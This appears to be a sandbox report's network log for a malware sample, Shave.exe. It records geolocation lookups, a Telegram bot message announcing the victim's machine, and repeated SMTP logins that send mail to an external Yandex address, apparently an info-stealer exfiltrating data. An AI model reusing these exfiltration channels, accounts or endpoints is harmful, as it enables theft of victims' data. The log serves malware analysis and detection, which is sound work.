                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mPIFAOK5nnj5RvPYTIL%2FY8CmKmpFQpmbbZar1TnKY4M%2FTuvTusVwAXo2W6w1mTHjdQ8cR2hvzdOq4cFPNvDgK3Ii5gXN7B75NW5VwC5K%2BbTXO%2BsWm4WA04ghNaHhINVCeK%2FCQQwM"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e7f77b65da97c88-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1925&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1442687&cwnd=211&unsent_bytes=0&cid=d29d63107e5d3d01&ts=459&x=0"
                                                                                                                              2024-11-25 06:09:02 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                              Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              4192.168.2.549811172.67.177.1344437044C:\Users\user\Desktop\Shave.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-25 06:09:05 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-11-25 06:09:06 UTC852INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 25 Nov 2024 06:09:06 GMT
                                                                                                                              Content-Type: text/xml
                                                                                                                              Content-Length: 361
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                              CF-Cache-Status: HIT
                                                                                                                              Age: 478855
                                                                                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Al3QPK%2Fo1Z%2FqoKu2ncc5AhazAefQJKgQKLNmhogqbAXlqpOVKHLA6jzkvvrVDPiJEV%2BXz5sqboG85cHs4qtBZlQ1QJEW4U%2FmM7JaDmU8RLkKbw6lVC4bj6vuSl0c1RZmGuswwkwB"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e7f77cd583b428f-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1753&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1615938&cwnd=83&unsent_bytes=0&cid=287c3e6ad07ee9ed&ts=472&x=0"
                                                                                                                              2024-11-25 06:09:06 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                              Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              5192.168.2.549827172.67.177.1344437044C:\Users\user\Desktop\Shave.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-25 06:09:11 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-11-25 06:09:11 UTC853INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 25 Nov 2024 06:09:11 GMT
                                                                                                                              Content-Type: text/xml
                                                                                                                              Content-Length: 361
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                              CF-Cache-Status: HIT
                                                                                                                              Age: 478860
                                                                                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D8H%2B8UjT6LKZzddtRqVSWTRYdfImqNi6q%2Fmf6PM%2BvG9RL95JKRWULKCysgjn9t97LYvWyAV4ECfdqm2lOtVx1Evgk8wbqLjDuWW44LFDbUiUDKNmsdTJlbokUpENxigwzc%2B8N7cp"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e7f77f0ee0b4249-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1608&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1775075&cwnd=225&unsent_bytes=0&cid=3710e4057bbcf84d&ts=452&x=0"
                                                                                                                              2024-11-25 06:09:11 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                              Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              6192.168.2.549840172.67.177.1344437044C:\Users\user\Desktop\Shave.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-25 06:09:17 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-11-25 06:09:18 UTC859INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 25 Nov 2024 06:09:18 GMT
                                                                                                                              Content-Type: text/xml
                                                                                                                              Content-Length: 361
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                              CF-Cache-Status: HIT
                                                                                                                              Age: 478867
                                                                                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jF1uKD48jRIZPcVBjv493c3DsVFWWXNSHTxtk6PsWZ7IKuQ9dbk6CGGsVooMBjf%2BtY69uqSfP0lbtUmfnxIHMtjgla6zq%2F9T%2BM%2FRauQiVhHwN4b3EgKqK%2FEw4%2FFfUTDLndh9J%2B4B"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e7f7817ffa08ce2-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1968&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1446260&cwnd=202&unsent_bytes=0&cid=7aeb465f34d7eb23&ts=459&x=0"
                                                                                                                              2024-11-25 06:09:18 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                              Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              7192.168.2.549851172.67.177.1344437044C:\Users\user\Desktop\Shave.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-25 06:09:20 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-11-25 06:09:21 UTC857INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 25 Nov 2024 06:09:21 GMT
                                                                                                                              Content-Type: text/xml
                                                                                                                              Content-Length: 361
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                              CF-Cache-Status: HIT
                                                                                                                              Age: 478870
                                                                                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RWxIM4yHbFo4EOm4Y3bq6Z1Y%2FHBbADyM84JixRrC3oC1%2FLYl1oxC0saJMzo%2B7rjXiZ0rIecwJzdzluX1q%2FtPLQw0IsM%2BXm3xMiyiOHjeA7EyttJ%2BAyALWI84oqfjl93hNlt0zpJO"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e7f782c0f3242db-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1777&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1701631&cwnd=231&unsent_bytes=0&cid=f826643765e39577&ts=459&x=0"
                                                                                                                              2024-11-25 06:09:21 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                              Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              8192.168.2.549859172.67.177.1344437044C:\Users\user\Desktop\Shave.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-25 06:09:24 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-11-25 06:09:25 UTC855INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 25 Nov 2024 06:09:24 GMT
                                                                                                                              Content-Type: text/xml
                                                                                                                              Content-Length: 361
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                              CF-Cache-Status: HIT
                                                                                                                              Age: 478873
                                                                                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dszxD7JvBSI212SAvfN56hT%2B%2FKCH0e1cMP%2BSTMfvgk4D142kx3vwEbuaI1APTh3jL%2FC9DsNcuLZT5e5X99iiso8rUJvh4iT8wK3ny3eAYzjf%2B2vp2XIm8QNLaKCXyztupTglmH7l"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e7f7842bba742b3-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1710&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1716637&cwnd=236&unsent_bytes=0&cid=2e87c289766580f6&ts=460&x=0"
                                                                                                                              2024-11-25 06:09:25 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                              Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              9192.168.2.549865149.154.167.2204437044C:\Users\user\Desktop\Shave.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-25 06:09:26 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2026/11/2024%20/%2019:05:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20899552%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                              Host: api.telegram.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-11-25 06:09:27 UTC344INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Date: Mon, 25 Nov 2024 06:09:27 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 55
                                                                                                                              Connection: close
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                              2024-11-25 06:09:27 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                              Nov 25, 2024 07:09:35.713319063 CET58749886199.79.63.24192.168.2.5220-bh-58.webhostbox.net ESMTP Exim 4.96.2 #2 Mon, 25 Nov 2024 11:39:35 +0530
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 25, 2024 07:09:35.713610888 CET49886587192.168.2.5199.79.63.24EHLO 899552
                                                                                                                              Nov 25, 2024 07:09:36.107814074 CET58749886199.79.63.24192.168.2.5250-bh-58.webhostbox.net Hello 899552 [8.46.123.75]
                                                                                                                              250-SIZE 52428800
                                                                                                                              250-8BITMIME
                                                                                                                              250-PIPELINING
                                                                                                                              250-PIPECONNECT
                                                                                                                              250-AUTH PLAIN LOGIN
                                                                                                                              250-STARTTLS
                                                                                                                              250 HELP
                                                                                                                              Nov 25, 2024 07:09:36.108850002 CET49886587192.168.2.5199.79.63.24AUTH login bXVrZXNoQGNpcG1hY2guY29t
                                                                                                                              Nov 25, 2024 07:09:36.503189087 CET58749886199.79.63.24192.168.2.5334 UGFzc3dvcmQ6
                                                                                                                              Nov 25, 2024 07:09:37.025199890 CET58749886199.79.63.24192.168.2.5235 Authentication succeeded
                                                                                                                              Nov 25, 2024 07:09:37.025454998 CET49886587192.168.2.5199.79.63.24MAIL FROM:<mukesh@cipmach.com>
                                                                                                                              Nov 25, 2024 07:09:37.421365976 CET58749886199.79.63.24192.168.2.5250 OK
                                                                                                                              Nov 25, 2024 07:09:37.421561003 CET49886587192.168.2.5199.79.63.24RCPT TO:<py.thonk@yandex.com>
                                                                                                                              Nov 25, 2024 07:09:37.854011059 CET58749886199.79.63.24192.168.2.5250 Accepted
                                                                                                                              Nov 25, 2024 07:09:37.854224920 CET49886587192.168.2.5199.79.63.24DATA
                                                                                                                              Nov 25, 2024 07:09:38.252501965 CET58749886199.79.63.24192.168.2.5354 Enter message, ending with "." on a line by itself
                                                                                                                              Nov 25, 2024 07:09:38.253202915 CET49886587192.168.2.5199.79.63.24.
                                                                                                                              Nov 25, 2024 07:09:38.752681017 CET58749886199.79.63.24192.168.2.5250 OK id=1tFSHy-000O7a-0A
                                                                                                                              Nov 25, 2024 07:09:38.754858017 CET49886587192.168.2.5199.79.63.24QUIT
                                                                                                                              Nov 25, 2024 07:09:39.350253105 CET58749886199.79.63.24192.168.2.5221 bh-58.webhostbox.net closing connection
                                                                                                                              Nov 25, 2024 07:09:40.791296959 CET58749898199.79.63.24192.168.2.5220-bh-58.webhostbox.net ESMTP Exim 4.96.2 #2 Mon, 25 Nov 2024 11:39:40 +0530
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 25, 2024 07:09:40.791568995 CET49898587192.168.2.5199.79.63.24EHLO 899552
                                                                                                                              Nov 25, 2024 07:09:41.186019897 CET58749898199.79.63.24192.168.2.5250-bh-58.webhostbox.net Hello 899552 [8.46.123.75]
                                                                                                                              250-SIZE 52428800
                                                                                                                              250-8BITMIME
                                                                                                                              250-PIPELINING
                                                                                                                              250-PIPECONNECT
                                                                                                                              250-AUTH PLAIN LOGIN
                                                                                                                              250-STARTTLS
                                                                                                                              250 HELP
                                                                                                                              Nov 25, 2024 07:09:41.186201096 CET49898587192.168.2.5199.79.63.24AUTH login bXVrZXNoQGNpcG1hY2guY29t
                                                                                                                              Nov 25, 2024 07:09:41.580845118 CET58749898199.79.63.24192.168.2.5334 UGFzc3dvcmQ6
                                                                                                                              Nov 25, 2024 07:09:42.012026072 CET58749898199.79.63.24192.168.2.5235 Authentication succeeded
                                                                                                                              Nov 25, 2024 07:09:42.012243986 CET49898587192.168.2.5199.79.63.24MAIL FROM:<mukesh@cipmach.com>
                                                                                                                              Nov 25, 2024 07:09:42.406829119 CET58749898199.79.63.24192.168.2.5250 OK
                                                                                                                              Nov 25, 2024 07:09:42.406996965 CET49898587192.168.2.5199.79.63.24RCPT TO:<py.thonk@yandex.com>
                                                                                                                              Nov 25, 2024 07:09:42.838032007 CET58749898199.79.63.24192.168.2.5250 Accepted
                                                                                                                              Nov 25, 2024 07:09:42.838196039 CET49898587192.168.2.5199.79.63.24DATA
                                                                                                                              Nov 25, 2024 07:09:43.232280970 CET58749898199.79.63.24192.168.2.5354 Enter message, ending with "." on a line by itself
                                                                                                                              Nov 25, 2024 07:09:43.233875990 CET49898587192.168.2.5199.79.63.24.
                                                                                                                              Nov 25, 2024 07:09:43.636759996 CET58749898199.79.63.24192.168.2.5250 OK id=1tFSI3-000OA6-07
                                                                                                                              Nov 25, 2024 07:09:45.156111956 CET49898587192.168.2.5199.79.63.24QUIT
                                                                                                                              Nov 25, 2024 07:09:45.751384020 CET58749898199.79.63.24192.168.2.5221 bh-58.webhostbox.net closing connection
                                                                                                                              Nov 25, 2024 07:09:47.061172962 CET58749913199.79.63.24192.168.2.5220-bh-58.webhostbox.net ESMTP Exim 4.96.2 #2 Mon, 25 Nov 2024 11:39:46 +0530
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 25, 2024 07:09:47.061311960 CET49913587192.168.2.5199.79.63.24EHLO 899552
                                                                                                                              Nov 25, 2024 07:09:47.437448978 CET58749913199.79.63.24192.168.2.5250-bh-58.webhostbox.net Hello 899552 [8.46.123.75]
                                                                                                                              250-SIZE 52428800
                                                                                                                              250-8BITMIME
                                                                                                                              250-PIPELINING
                                                                                                                              250-PIPECONNECT
                                                                                                                              250-AUTH PLAIN LOGIN
                                                                                                                              250-STARTTLS
                                                                                                                              250 HELP
                                                                                                                              Nov 25, 2024 07:09:47.437622070 CET49913587192.168.2.5199.79.63.24AUTH login bXVrZXNoQGNpcG1hY2guY29t
                                                                                                                              Nov 25, 2024 07:09:48.019036055 CET58749913199.79.63.24192.168.2.5334 UGFzc3dvcmQ6
                                                                                                                              Nov 25, 2024 07:09:48.397633076 CET58749913199.79.63.24192.168.2.5235 Authentication succeeded
                                                                                                                              Nov 25, 2024 07:09:48.397772074 CET49913587192.168.2.5199.79.63.24MAIL FROM:<mukesh@cipmach.com>
                                                                                                                              Nov 25, 2024 07:09:48.773571968 CET58749913199.79.63.24192.168.2.5250 OK
                                                                                                                              Nov 25, 2024 07:09:48.777089119 CET49913587192.168.2.5199.79.63.24RCPT TO:<py.thonk@yandex.com>
                                                                                                                              Nov 25, 2024 07:09:49.209161997 CET58749913199.79.63.24192.168.2.5250 Accepted
                                                                                                                              Nov 25, 2024 07:09:49.209316015 CET49913587192.168.2.5199.79.63.24DATA
                                                                                                                              Nov 25, 2024 07:09:49.585128069 CET58749913199.79.63.24192.168.2.5354 Enter message, ending with "." on a line by itself
                                                                                                                              Nov 25, 2024 07:09:49.585777998 CET49913587192.168.2.5199.79.63.24.
                                                                                                                              Nov 25, 2024 07:09:50.068130970 CET58749913199.79.63.24192.168.2.5250 OK id=1tFSI9-000OD1-1H
                                                                                                                              Nov 25, 2024 07:09:50.069581032 CET49913587192.168.2.5199.79.63.24QUIT
                                                                                                                              Nov 25, 2024 07:09:50.646209002 CET58749913199.79.63.24192.168.2.5221 bh-58.webhostbox.net closing connection
                                                                                                                              Nov 25, 2024 07:09:52.019323111 CET58749925199.79.63.24192.168.2.5220-bh-58.webhostbox.net ESMTP Exim 4.96.2 #2 Mon, 25 Nov 2024 11:39:51 +0530
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 25, 2024 07:09:52.019478083 CET49925587192.168.2.5199.79.63.24EHLO 899552
                                                                                                                              Nov 25, 2024 07:09:52.403913975 CET58749925199.79.63.24192.168.2.5250-bh-58.webhostbox.net Hello 899552 [8.46.123.75]
                                                                                                                              250-SIZE 52428800
                                                                                                                              250-8BITMIME
                                                                                                                              250-PIPELINING
                                                                                                                              250-PIPECONNECT
                                                                                                                              250-AUTH PLAIN LOGIN
                                                                                                                              250-STARTTLS
                                                                                                                              250 HELP
                                                                                                                              Nov 25, 2024 07:09:52.404251099 CET49925587192.168.2.5199.79.63.24AUTH login bXVrZXNoQGNpcG1hY2guY29t
                                                                                                                              Nov 25, 2024 07:09:52.788863897 CET58749925199.79.63.24192.168.2.5334 UGFzc3dvcmQ6
                                                                                                                              Nov 25, 2024 07:09:53.194047928 CET58749925199.79.63.24192.168.2.5235 Authentication succeeded
                                                                                                                              Nov 25, 2024 07:09:53.194350004 CET49925587192.168.2.5199.79.63.24MAIL FROM:<mukesh@cipmach.com>
                                                                                                                              Nov 25, 2024 07:09:53.578747034 CET58749925199.79.63.24192.168.2.5250 OK
                                                                                                                              Nov 25, 2024 07:09:53.578918934 CET49925587192.168.2.5199.79.63.24RCPT TO:<py.thonk@yandex.com>
                                                                                                                              Nov 25, 2024 07:09:54.016118050 CET58749925199.79.63.24192.168.2.5250 Accepted
